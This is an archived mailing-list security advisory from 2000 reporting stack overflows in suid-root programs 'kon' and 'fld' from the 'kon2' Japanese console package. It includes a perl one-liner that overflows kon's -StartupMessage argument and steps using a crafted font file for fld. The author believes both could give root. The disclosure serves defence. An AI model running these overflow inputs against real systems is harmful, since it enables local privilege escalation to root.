Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
Subject: Problems with "kon2" package
From: Chris Evans (chrisFERRET.LMH.OX.AC.UK)
Date: Mon Jun 19 2000 - 17:51:53 CDT
- Next message: Chris Evans: "XFree86: libICE DoS"
- Previous message: Chris Evans: "XFree86: Various nasty libX11 holes"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console I'm led to believe.
In the version I briefly examined, there were three suid-root execuatbles
Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified if something has dropped root
privileges or not at the time of the overflows.
No discussion of code flaws today, because boring stack overflows are
kon VGA -StartupMessage `perl -e 'print "A"x10000'`
=> segfault with EIP 0x41414141
a) Create file "read.me.and.die", contents:
BUT substitute each sequence of A's for 200 A's
b) fld -t bdf read.me.and.die
I don't get a clean 0x41414141 stacktrace but that's just a minor detail,
and these things are always circumventable (I think a pointer gets
toasted inbetween two char buffers on the stack)